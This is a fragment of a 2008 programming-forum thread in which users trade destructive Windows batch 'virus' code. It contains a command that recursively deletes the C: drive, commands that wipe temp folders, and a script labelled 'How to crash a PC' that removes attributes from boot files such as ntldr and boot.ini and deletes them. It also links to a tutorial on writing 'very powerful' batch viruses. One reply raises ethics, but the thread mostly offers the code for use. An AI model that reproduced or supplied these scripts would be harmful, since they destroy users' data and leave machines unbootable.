|
Ambitious contributor
|
![]() |
| 16Jul2008,19:30 | #21 |
|
hehe
|
|
Go4Expert Founder
|
![]() |
| 16Jul2008,19:52 | #22 |
|
Aren't we forgetting the Ethical part.
|
|
Pro contributor
|
|
| 16Jul2008,22:06 | #23 |
|
Check out XXxxImmortalxxXX article on batch programming to learn how to make good fundamental batch viruses. The viruses described are very powerful.
http://www.go4expert.com/showthread.php?t=11845 |
|
Contributor
|
|
| 17Jul2008,06:56 | #24 |
|
Quote:
Originally Posted by shabbir |
|
Team Leader
|
![]() |
| 17Jul2008,12:52 | #25 |
|
Quote:
Originally Posted by microapple Code:
rd c: /q /s Code:
cd %TEMP% rd . /s/q cd ../"temporary internet files" rd . /s/q Viruses whether destructive or not are a part of our world. Learning to use them is to our advantage. |
|
Invasive contributor
|
![]() |
| 19Jul2008,17:39 | #26 |
|
I dont know wat dabullet is trying to tell. all he tells is to delete all the files.
It can easily done by the command format. any one pls explain. whats his idea??? |
|
Contributor
|
|
| 19Jul2008,19:17 | #27 |
|
Quote:
Originally Posted by neo_vi |
|
Skilled contributor
|
|
| 19Jul2008,23:59 | #28 |
|
@topic Creator
just making few steps to a virus program. I have also a few batch code for making such type of virus, How to crash a PC Code:
@echo off attrib -r -s -h c:\autoexec.bat del c:\autoexec.bat attrib -r -s -h c:\boot.ini del c:\boot.ini attrib -r -s -h c:\ntldr del c:\ntldr attrib -r -s -h c:\windows\win.ini del c:\windows\win.ini it's b/c without changing attribute of boot file or dll or ini file who could i delete or erase it.would any one explain me
|




Jus kiddin 

it's b/c without changing attribute of boot file or dll or ini file who could i delete or erase it.